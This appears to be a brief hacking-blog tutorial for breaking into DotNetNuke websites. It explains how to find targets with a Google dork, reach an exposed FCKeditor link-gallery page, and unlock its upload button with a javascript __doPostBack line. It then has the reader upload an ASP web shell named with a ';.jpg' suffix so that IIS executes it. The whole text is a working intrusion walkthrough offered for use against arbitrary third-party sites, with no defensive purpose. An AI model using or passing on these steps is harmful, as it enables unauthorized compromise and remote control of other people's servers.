1. find a dotnetNuke site using this google dork.
google dork :- inurl:default.aspx
2. suppose that u found a site http://sName/default.aspx
3. Now copy this "/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" without quotes
4. Paste it in front of the link replacing "default.aspx" like this http://sName/HtmlEditorProviders/Fck/fcklinkgallery.aspx and Press enter
5. if its vulnerable a gallery page will be open as shown
6. paste the following javascript code into the address bar and press enter: “javascript:__doPostBack('ctlURL$cmdUpload','')” Now Browse button will become available
7. Now change file location to Root and upload ASp shell
Click here to Download ASp Shell
8. Now go to your shell www.sName.com/portals/0/yourshellname.asp;.jpg
eg : shell.asp;.jpg
9. IIS will not recognize extension after semi colon and it will execute the shell as asp :-)
Sign up here with your email
ConversionConversion EmoticonEmoticon